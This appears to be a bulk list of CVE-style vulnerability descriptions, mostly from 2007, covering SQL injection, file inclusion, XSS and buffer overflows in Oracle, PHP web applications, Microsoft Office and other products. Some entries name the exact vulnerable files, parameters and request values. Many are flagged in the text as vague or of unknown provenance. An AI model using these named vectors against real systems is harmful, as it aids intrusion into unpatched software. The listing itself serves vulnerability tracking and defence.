Multiple unspecified vulnerabilities in Oracle Database 10.2.0.3 have unknown impact and remote authenticated attack vectors related to (1) Rules Manager and Expression Filter components (DB02) and (2) Oracle Streams (DB06).  Note: as of 20070424, Oracle has not disputed reliable claims that DB02 is for a race condition in the RLMGR_TRUNCATE_MAINT trigger in the Rules Manager and Expression Filter components changing the AUTHID of a package from DEFINER to CURRENT_USER after a TRUNCATE call, and DB06 is for SQL injection in the DBMS_APPLY_USER_AGENT.SET_REGISTRATION_HANDLER procedure, which is later passed to the DBMS_APPLY_ADM_INTERNAL.ALTER_APPLY procedure, aka "Oracle Streams".
Unspecified vulnerability in the Core RDBMS component in Oracle Database 9.0.1.5, 9.2.0.8, 10.1.0.5, and 10.2.0.2 on Windows allows remote attackers to have an unknown impact, aka DB01.  NOTE: as of 20070424, Oracle has not disputed reliable claims that this issue occurs because the NTLM SSPI AcceptSecurityContext function grants privileges based on the username provided even though all users are authenticated as Guest, which allows remote attackers to gain privileges.
SQL injection vulnerability in visit.php in the Rha7 Downloads (rha7downloads) 1.0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the cid parameter, a different vector than CVE-2007-1960.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
FAC Guestbook 3.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/gbdb.mdb.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Direct static code injection vulnerability in index.php in Limesoft Guestbook (LS Simple Guestbook) allows remote attackers to inject arbitrary PHP code into posts.txt via the name parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in CNStats 2.12, when register_globals is enabled and .htaccess is not recognized, allow remote attackers to execute arbitrary PHP code via a URL in the bn parameter to (1) who_r.php or (2) who_s.php in reports/.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in db/PollDB.php in Robert Ladstaetter ActionPoll 1.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG_DATAREADERWRITER parameter, a different vector than CVE-2001-1297.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SSH Tectia Server for IBM z/OS before 5.4.0 uses insecure world-writable permissions for (1) the server pid file, which allows local users to cause arbitrary processes to be stopped, or (2) when _BPX_BATCH_UMASK is missing from the environment, creates HFS files with insecure permissions, which allows local users to read or modify these files and have other unknown impact.
AFFLIB 2.2.8 and earlier allows attackers to execute arbitrary commands via shell metacharacters involving (1) certain command line parameters in tools/afconvert.cpp and (2) arguments to the get_parameter function in aimage/ident.cpp.  NOTE: it is unknown if the get_parameter vector (2) is ever called.
Off-by-one error in the PyLocale_strxfrm function in Modules/_localemodule.c for Python 2.4 and 2.5 causes an incorrect buffer size to be used for the strxfrm function, which allows context-dependent attackers to read portions of memory via unknown manipulations that trigger a buffer over-read due to missing null termination.
Buffer overflow in the parsecmd function in bftpd before 1.8 has unknown impact and attack vectors related to the confstr variable.
Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia Lite 1.0.6 and earlier module for Mambo allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) support.html.php or (2) info.html.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.00 allows local users to cause a denial of service via unknown vectors.  NOTE: due to lack of vendor details, it is not clear whether this is the same as CVE-2007-0916.
PHP remote file inclusion vulnerability in games.php in Sam Crew MyBlog, possibly 1.0 through 1.6, allows remote attackers to execute arbitrary PHP code via a URL in the id parameter, a different vector than CVE-2007-1968.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the process_cmdent function in command.cpp in TinyMUX before 2.4 has unknown impact and attack vectors, related to lack of the "'other half' of buffer overflow protection."
Multiple stack-based buffer overflows in the SignKorea SKCrypAX ActiveX control module 5.4.1.2 allow remote attackers to execute arbitrary code via a long string in unspecified arguments to the (1) DownloadCert, (2) DecryptFileByKey, and (3) EncryptFileByKey functions, a different module and vectors than CVE-2007-1722.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Servlet Engine/Web Container in IBM WebSphere Application Server (WAS) before 6.1.0.7 has unknown impact and attack vectors.
The Java Message Service (JMS) in IBM WebSphere Application Server (WAS) before 6.1.0.7 allows attackers to cause a denial of service via unknown vectors involving the "double release [of] a bytebuffer input stream," possibly a double free vulnerability.
Ichitaro 2005 through 2007, and possibly related products, allows remote attackers to have an unknown impact via unspecified vectors in a document distributed through e-mail or a web site, possibly due to a buffer overflow or cross-site scripting (XSS).
Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file.
Integer overflow in the str_replace function in PHP 4.4.5 and PHP 5.2.1 allows context-dependent attackers to have an unknown impact via a single character search string in conjunction with a single character replacement string, which causes an "off by one overflow."
Buffer overflow in the bundled libxmlrpc library in PHP before 4.4.7, and 5.x before 5.2.2, has unknown impact and remote attack vectors.
lib/modules.inc in LDAP Account Manager (LAM) before 1.3.0 does not escape HTML special characters in LDAP data, which allows remote attackers to have an unknown impact, probably cross-site scripting (XSS).
Unspecified vulnerability in the Username Hijacking Patch 20070312 for web-app.org WebAPP 0.9.9.6 allows remote attackers to obtain administrative access via unknown vectors, related to "something overlooked in the original that was still overlooked in the patch", and possibly related to copying files to the user-lib and the "XSS and cookies exploit."
Multiple unspecified vulnerabilities in web-app.net WebAPP have unknown impact and attack vectors, described as "[having] other [security] issues too, not as bad as letting users take over your admin account, but bad too."
JCcorp URLshrink 1.3.1 allows remote attackers to execute arbitrary PHP code via the email address field in an HTML link.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unrestricted file upload vulnerability in upload.php3 in JBrowser 2.4 and earlier allows remote attackers to upload and execute arbitrary PHP code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in (1) Deskbar.dll and (2) Toolbar.dll in AOL 9.0 before February 2007 allows remote attackers to cause a denial of service (browser crash) via unknown vectors.
The chm_decompress_stream function in libclamav/chmunpack.c in Clam AntiVirus (ClamAV) before 0.90.2 leaks file descriptors, which has unknown impact and attack vectors involving a crafted CHM file, a different vulnerability than CVE-2007-0897.  NOTE: some of these details are obtained from third party information.
** DISPUTED **
Unspecified vulnerability in ReactOS 0.3.1 has unknown impact and attack vectors, related to a fix for "dozens of win32k bugs and failures," in which the fix itself introduces a vulnerability, possibly related to user-mode and kernel-mode copy failures.
Multiple SQL injection vulnerabilities in index.php in Katalog Plyt Audio 1.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) fraza and (2) litera parameters, different vectors than CVE-2007-1612.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in TYPOlight webCMS before 2.2 Build 5 has unknown impact and attack vectors related to a "major security hole."
Multiple SQL injection vulnerabilities in realGuestbook 5.01 allow remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) homepage, and (4) text parameters to save_entry.php, as reachable through add_entry.php; and possibly other unspecified parameters and files.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in realGuestbook 5.01, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) bg_color_1, (2) fs_menu, (3) fc_menu, (4) ff_menu, (5) bg_color_2, (6) fs_normal, (7) fc_normal, and (8) ff_normal parameters to welcome_admin.php; and possibly unspecified other parameters and files.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The Asterisk Extension Language (AEL) in pbx/pbx_ael.c in Asterisk does not properly generate extensions, which allows remote attackers to execute arbitrary extensions and have an unknown impact by specifying an invalid extension in a certain form.
Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
CARE2X 2.2, and possibly earlier, allows remote attackers to obtain configuration information via a direct request to phpinfo.php, which calls the phpinfo function.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in search.asp in JGBBS 3.0 Beta 1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter, a different vector than CVE-2007-1440.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Direct static code injection vulnerability in admin/configuration.php in Guestbara 1.2 and earlier allows remote authenticated users to inject arbitrary PHP code into config.php via the (1) admin_mail, (2) emotpatch, (3) login, (4) pass, and unspecified other parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Cisco IP Phone 7940 and 7960 running firmware before POS8-6-0 allows remote attackers to cause a denial of service via the Remote-Party-ID sipURI field in a SIP INVITE request. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window.
Heap-based buffer overflow in the kernel in NetBSD 3.0, certain versions of FreeBSD and OpenBSD, and possibly other BSD derived operating systems allows local users to have an unknown impact.  NOTE: this information is based upon a vague pre-advisory with no actionable information. Details will be updated after 20070329.
Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025.
Unspecified vulnerability in admin.pl in SQL-Ledger before 2.6.26 and LedgerSMB before 1.1.9 allows remote attackers to bypass authentication via unknown vectors that prevents a password check from occurring.
Buffer overflow in D-Link TFTP Server 1.0 allows remote attackers to cause a denial of service (crash) via a long (1) GET or (2) PUT request, which triggers memory corruption.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple vulnerabilities in (1) bank.php, (2) landfill.php, (3) outposts.php, (4) tribes.php, (5) house.php, (6) tribearmor.php, (7) tribeastral.php, (8) tribeware.php, and (9) includes/head.php in Bartek Jasicki Vallheru before 1.3 beta have unknown impact and remote attack vectors, probably related to large integer values containing more than 15 digits.  NOTE: the original vendor report is for integer overflows, but this is probably an incorrect usage of the term.
Unspecified vulnerability in OpenSolution Quick.Cart before 2.1 has unknown impact and attack vectors, related to a "low critical exploit."
Trac before 0.10.3.1 does not send a Content-Disposition HTTP header specifying an attachment in certain "unsafe" situations, which has unknown impact and remote attack vectors.
Cross-site scripting (XSS) vulnerability in pop_profile.asp in Snitz Forums 2000 3.4.06 allows remote attackers to inject arbitrary web script or HTML via the MSN parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in Conquest 8.2a and earlier (1) allow local users to gain privileges by querying a metaserver that sends a long server entry processed by metaGetServerList and allow remote metaservers to execute arbitrary code via a long server entry processed by metaGetServerList; (2) allow attackers to have an unknown impact by exceeding the configured number of metaservers; and allow remote attackers to corrupt memory via a SP_CLIENTSTAT packet with certain values of (3) unum or (4) snum, different vulnerabilities than CVE-2003-0933.
The virtual machine process (VMX) in VMware Workstation before 5.5.4 does not properly read state information when moving from the ACPI sleep state to the run state, which allows attackers to cause a denial of service (virtual machine reboot) via unknown vectors.
Unspecified vulnerability in Lenovo Intel PRO/1000 LAN adapter before Build 135400, as used on IBM Lenovo ThinkPad systems, has unknown impact and attack vectors.
DOURAN Software Technologies ISPUtil 3.32.84.1, and possibly earlier versions, stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user and reseller data via a direct request for scripts/activesessions.ini.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in ViewReport.php in Tyger Bug Tracking System (TygerBT) 1.1.3 allows remote attackers to execute arbitrary SQL commands via the bug parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in WebAPP before 0.9.9.6 have unknown impact and attack vectors.
Audins Audiens 3.3 allows remote attackers to bypass authentication and perform certain privileged actions, possibly an uninstall of the product, by calling unistall.php with the values cnf=disinstalla and status=on.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in system/index.php in Audins Audiens 3.3 allows remote attackers to execute arbitrary SQL commands via the PHPSESSID cookie.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in setup.php in Audins Audiens 3.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Docebo CMS 3.0.3 through 3.0.5 allow remote attackers to inject arbitrary web script or HTML via (1) the searchkey parameter to index.php, or the (2) sn or (3) ri parameter to modules/htmlframechat/index.php.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in Epiware before 4.7.5 have unknown impact and attack vectors, possibly related to cross-site scripting (XSS) and other unspecified issues.
Multiple unspecified vulnerabilities in the Login page in OrangeHRM before 20070212 have unknown impact and attack vectors.
Unspecified vulnerability in the EmbeddedWB Web Browser ActiveX control allows remote attackers to execute arbitrary code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
WebAPP before 0.9.9.5 allows remote attackers to submit Search form input that is not checked for (1) composition or (2) length, which has unknown impact, possibly related to "search form hijacking".
WebAPP before 0.9.9.5 does not "censor" the Latest Member real name, which has unknown impact.
The (1) Search, (2) Edit Profile, (3) Recommend, and (4) User Approval forms in WebAPP before 0.9.9.5 use hidden inputs, which has unknown impact and remote attack vectors.
WebAPP before 0.9.9.5 allows remote authenticated users to spoof another user's Real Name via whitespace, which has unknown impact and attack vectors.
WebAPP before 0.9.9.5 allows remote Guest users to edit a Guest profile, which has unknown impact.
WebAPP before 0.9.9.5 passes (1) Unused Informations and (2) the username through Edit Profile forms, which has unknown impact and attack vectors.
WebAPP before 0.9.9.5 does not check referrers in certain forms, which might facilitate remote cross-site request forgery (CSRF) attacks or have other unknown impact.
WebAPP before 0.9.9.5 does not properly manage e-mail addresses in certain contexts related to (1) the Recommend feature, Email Article (2) senders and (3) recipients, (4) New User Approval, (5) Edit Profiles, (6) the Newsletter Subscription form, (7) the Recommend form, and (8) sending of articles, which has unknown impact, and remote attack vectors related to spam attacks and possibly other attacks.
WebAPP before 0.9.9.5 does not check access in certain contexts related to (1) Calendar Administration, (2) Instant Messages Administration, and (3) the Image Uploader, which has unknown impact and attack vectors.
WebAPP before 0.9.9.5 does not properly filter certain characters in contexts related to (1) the query string, (2) Profiles, (3) the Forum Post icon field, (4) the Edit Profile, and (5) the Gallery, which has unknown impact and remote attack vectors, possibly related to cross-site scripting (XSS).
Cross-site scripting (XSS) vulnerability in modules/out.php in Pyrophobia 2.1.3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in CutePHP CuteNews 1.3.6 allow remote attackers to execute arbitrary PHP code via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information. NOTE: issue might overlap CVE-2004-1660 or CVE-2006-4445.
Unspecified vulnerability in Watchtower (WT) before 0.12 has unknown impact and attack vectors, related to "unauthorized accounts."
Multiple PHP remote file inclusion vulnerabilities in ZPanel 2.0 allow remote attackers to execute arbitrary PHP code via a URL in (1) the body parameter to templates/ZPanelV2/template.php or (2) the page parameter to zpanel.php.  NOTE: the zpanel.php vector may overlap CVE-2005-0793.2.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
The (1) Import.LoadFromURL and (2) Export.asText.SaveToFile functions in TeeChart Pro ActiveX control (TeeChart7.ocx) allow remote attackers to download a crafted .tee file to an arbitrary location.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in ScryMUD before 2.1.11 have unknown impact and attack vectors, possibly related to denial of service caused by a search that begins with a .* sequence.
IBM DB2 Universal Database (UDB) 9.1 GA through 9.1 FP1 allows local users with table SELECT privileges to perform unauthorized UPDATE and DELETE SQL commands via unknown vectors.
The start function in class.t3lib_formmail.php in TYPO3 before 4.0.5, 4.1beta, and 4.1RC1 allows attackers to inject arbitrary email headers via unknown vectors.  NOTE: some details were obtained from third party information.
SQL injection vulnerability in page.asp in Design4Online UserPages2 2.0 allows remote attackers to execute arbitrary SQL commands via the art_id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Directory traversal vulnerability in news.php in Xpression News (X-News) 1.0.1, when magic_quotes_gpc is disabled, allows remote attackers to include arbitrary files or obtain sensitive information via a .. (dot dot) in the xnews-template parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Peanut Knowledge Base (PeanutKB) 0.0.3 and earlier has unknown impact and attack vectors.
Shemes.com Grabit 1.5.3, and possibly earlier, allows remote attackers to cause a denial of service (application crash) via a .nzb file with a subject field containing ';' (semicolon) characters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Stack-based buffer overflow in News File Grabber 4.1.0.1 and earlier allows remote attackers to execute arbitrary code via a .nzb file with a long subject field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in certain demonstration scripts in getID3 1.7.1, as used in the Mediafield and Audio modules for Drupal, allows remote attackers to read and delete arbitrary files, list arbitrary directories, and write to empty files or .mp3 files via unknown vectors.
SQL injection vulnerability in h_goster.asp in Turuncu Portal 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in tpl/header.php in VirtualSystem VS-News-System 1.2.1 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the newsordner parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in Aktueldownload Haber script allows remote attackers to execute arbitrary SQL commands via certain vectors related to the HaberDetay.asp and rss.asp components, and the id and kid parameters.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.  NOTE: the combination of the HaberDetay.asp component and the id parameter is already covered by another February 2007 CVE candidate.
A vulnerability, which was classified as critical, has been found in The Hackers Diet Plugin up to 0.9.6b on WordPress. This issue affects some unknown processing of the file ajax_blurb.php of the component HTTP POST Request Handler. The manipulation of the argument user leads to sql injection. The attack may be initiated remotely. Upgrading to version 0.9.7b is able to address this issue. The patch is named 7dd8acf7cd8442609840037121074425d363b694. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-243803.
A vulnerability, which was classified as critical, has been found in web-cyradm. Affected by this issue is some unknown functionality of the file auth.inc.php. The manipulation of the argument login/login_password/LANG leads to sql injection. The attack may be launched remotely. The name of the patch is 2bcbead3bdb5f118bf2c38c541eaa73c29dcc90f. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217640.
A vulnerability classified as problematic has been found in web-cyradm. This affects an unknown part of the file search.php. The manipulation of the argument searchstring leads to sql injection. It is recommended to apply a patch to fix this issue. The identifier VDB-217449 was assigned to this vulnerability.
Cross-site scripting (XSS) vulnerability in error.php in TaskFreak! 0.5.5 allows remote attackers to inject arbitrary web script or HTML via the tznMessage parameter.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
Multiple unspecified vulnerabilities in Ian Bezanson DropBox before 0.0.4 beta have unknown impact and attack vectors, possibly related to a variable extraction vulnerability.
MOHA Chat 0.1b7 and earlier does not require authentication for use of the plug in API, which has unknown impact and attack vectors.
Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
Unspecified vulnerability in the Address and Routing Parameter Area (ARPA) transport functionality in HP-UX B.11.11 and B.11.23 allows local users to cause an unspecified denial of service via unknown vectors.
Race condition in the TCP subsystem for Solaris 10 allows remote attackers to cause a denial of service (system panic) via unknown vectors.
Unspecified vulnerability in Microsoft Powerpoint allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as exploited by Trojan.PPDropper.G.  NOTE: as of 20070213, it is not clear whether this is the same issue as CVE-2006-5296, CVE-2006-4694, CVE-2006-3876, CVE-2006-3877, or older issues.
Unspecified vulnerability in the mod_roster_odbc module in ejabberd before 1.1.3 has unknown impact and attack vectors.
Unspecified vulnerability in the "Show debugging information" feature in MoinMoin 1.5.7 allows remote attackers to obtain sensitive information.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Info pages in MoinMoin 1.5.7 allow remote attackers to inject arbitrary web script or HTML via the (1) hitcounts and (2) general parameters, different vectors than CVE-2007-0857.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in SmidgeonSoft PEBrowse Professional 8.2.1.0 allows user-assisted remote attackers to execute arbitrary code via certain executable files in PE format.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in March Networks DVR 3000 and 4000 Digital Video Recorders allows attackers to cause an unspecified denial of service.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Microsoft Word 2000 allows remote attackers to cause a denial of service (crash) via unknown vectors, a different vulnerability than CVE-2006-5994, CVE-2006-6456, CVE-2006-6561, and CVE-2007-0515, a variant of Exploit-MS06-027.
Cross-site scripting (XSS) vulnerability in the Attachment Manager (admincp/attachment.php) in Jelsoft vBulletin 3.6.4 allows remote attackers to inject arbitrary web script or HTML via the Extension field.  NOTE: this might be a duplicate of CVE-2007-0830.5.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in HP OpenView Storage Data Protector on HP-UX B.11.00, B.11.11, or B.11.23 allows local users to execute arbitrary code via unknown vectors.
SQL injection vulnerability in DevTrack 6.0.3 allows remote attackers to execute arbitrary SQL commands via the Username form field.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in DevTrack 6.x allows remote attackers to inject arbitrary web script or HTML via the "Keyword search" form field and unspecified other form fields that populate a public saved query.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple unspecified vulnerabilities in vbDrupal before 4.7.6.0 have unknown impact and remote attack vectors.  NOTE: the vector related to Drupal is covered by CVE-2007-0626.  These vulnerabilities might be associated with other CVE identifiers.
admin.php in Coppermine Photo Gallery 1.4.10, and possibly earlier, allows remote authenticated users to include arbitrary local and possibly remote files via the (1) "Path to custom header include" and (2) "Path to custom footer include" form fields.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
admin.php in Coppermine Photo Gallery 1.4.10, and possibly earlier, allows remote authenticated users to execute arbitrary shell commands via shell metacharacters (";" semicolon) in the "Command line options for ImageMagick" form field, when used as an option to ImageMagick's convert command.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in FlashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via the user name field when the user joins a chat room, a different vulnerability than CVE-2007-0807.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Multiple directory traversal vulnerabilities in Cedric CLAIRE PortailPhp 2 allow remote attackers to read arbitrary files via a .. (dot dot) in the chemin parameter to (1) mod_news/index.php or (2) mod_news/goodies.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple PHP remote file inclusion vulnerabilities in Cedric CLAIRE PortailPhp 2 allow remote attackers to execute arbitrary PHP code via a URL in the chemin parameter to (1) mod_news/index.php, (2) mod_news/goodies.php, or (3) mod_search/index.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
PHP remote file inclusion vulnerability in lang.php in PHPProbid 5.24 allows remote attackers to execute arbitrary PHP code via a URL in the SRC attribute of an HTML element in the lang parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in the authentication feature for DirectoryService (DS Plug-Ins) for Apple Mac OS X 10.3.9 and 10.4 through 10.4.8 allows remote authenticated LDAP users to modify the root password and gain privileges via unknown vectors.
Stack-based buffer overflow in GOM Player 2.0.12.3375 allows user-assisted remote attackers to execute arbitrary code via a .ASX file with a long URI in the "ref href" tag.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in ACGVannu 1.3 and earlier allow remote attackers to execute arbitrary SQL commands via the id_mod parameter to templates/modif.html, and other unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Microsoft Excel 2000, XP, 2003, and 2004 for Mac, and possibly other Office products, allows remote user-assisted attackers to execute arbitrary code via unknown attack vectors, as demonstrated by Exploit-MSExcel.h in targeted zero-day attacks.
Unspecified vulnerability in Twiki 4.0.0 through 4.1.0 allows local users to execute arbitrary Perl code via unknown vectors related to CGI session files.
SQL injection vulnerability in index.php in Eclectic Designs CascadianFAQ 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via the qid parameter, a different vector than CVE-2007-0631.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Buffer overflow in ZABBIX before 1.1.5 has unknown impact and attack vectors related to "SNMP IP addresses."
Unspecified vulnerability in inotify before 0.3.5 has unknown impact and attack vectors, related to "access rights to watched files."
Multiple SQL injection vulnerabilities in the generate_csv function in classes/class.news.php in X-dev xNews 1.3 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id, (2) from, and (3) q parameters, different vectors than CVE-2007-0569.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in MyBB (aka MyBulletinBoard) 1.2.2 allows remote attackers to send messages to arbitrary users.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site scripting (XSS) vulnerability in the mailform feature in CMSimple 2.7 fix1 allows remote attackers to inject arbitrary web script or HTML via the sender parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in HTTP Commander 6.0, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) LogoffMessage parameter to logofflast.aspx or the (2) txtUsername parameter to Default.aspx. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
SQL injection vulnerability in rss/show_webfeed.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.40 allows remote attackers to execute arbitrary SQL commands via the wcHeadlines parameter, a different vector than CVE-2006-4715.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple eval injection vulnerabilities in Vote! Pro 4.0, and possibly earlier, allow remote attackers to execute arbitrary code via requests to unspecified PHP scripts with the poll_id parameter, which is supplied to eval function calls, a different set of vectors than CVE-2007-0504.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple buffer overflows in Nickolas Grigoriadis Mini Web server (MiniWebsvr) before 0.05 have unknown impact and attack vectors.
Yana Framework before 2.8.5a allows remote authenticated users with permissions to modify a guestbook profile to modify or delete arbitrary guestbook profiles via unspecified vectors.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in Microsoft Word allows user-assisted remote attackers to execute arbitrary code on Word 2000, and cause a denial of service on Word 2003, via unknown attack vectors that trigger memory corruption, as exploited by Trojan.Mdropper.W and later by Trojan.Mdropper.X, a different issue than CVE-2006-6456, CVE-2006-5994, and CVE-2006-6561.
Multiple buffer overflows in (1) graphs.c, (2) output.c, and (3) preserve.c in AWFFull 3.7.1 and earlier have unknown impact and attack vectors.  NOTE: some of these details are obtained from third party information.  NOTE: There may not be any attack vector that crosses privilege boundaries.
Multiple unspecified vulnerabilities in MaklerPlus before 1.2 have unknown impact and attack vectors, possibly relating to cross-site scripting (XSS) in the slogan parameter in main.tpl, or information leaks in error messages.
Unspecified vulnerability in kcms_calibrate in Sun Solaris 8 and 9 before 20071122 allows local users to execute arbitrary commands via unknown vectors.
Multiple SQL injection vulnerabilities in gallery.php in webSPELL 4.01.02 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id or (2) galleryID parameter.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple SQL injection vulnerabilities in Enthusiast 3.1 allow remote attackers to execute arbitrary SQL commands via the cat parameter to (1) show_owned.php, (2) show_joined.php, and possibly other files. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple cross-site scripting (XSS) vulnerabilities in Enthusiast 3.1 allow remote attackers to inject arbitrary web script or HTML via the URI for (1) show_owned.php or (2) show_joined.php.  NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
Multiple memory leaks in the Dazuko anti-virus helper module before 2.3.2 allow attackers to cause a denial of service (memory consumption) via unknown vectors.
Multiple buffer overflows in ulogd for SUSE Linux 9.3 up to 10.1, and possibly other distributions, have unknown impact and attack vectors related to "improper string length calculations."
Unspecified vulnerability in IBM OS/400 R530 and R535 has unknown impact and remote attack vectors, related to an "Integrity Problem" involving LIC-TCPIP and TCP reset.  NOTE: it is possible that this issue is related to CVE-2004-0230, but this is not certain.
Unspecified vulnerability in HP OpenView Network Node Manager (OV NNM) 6.20, 6.4x, 7.01, and 7.50 allows remote attackers to execute arbitrary commands via unknown vectors.
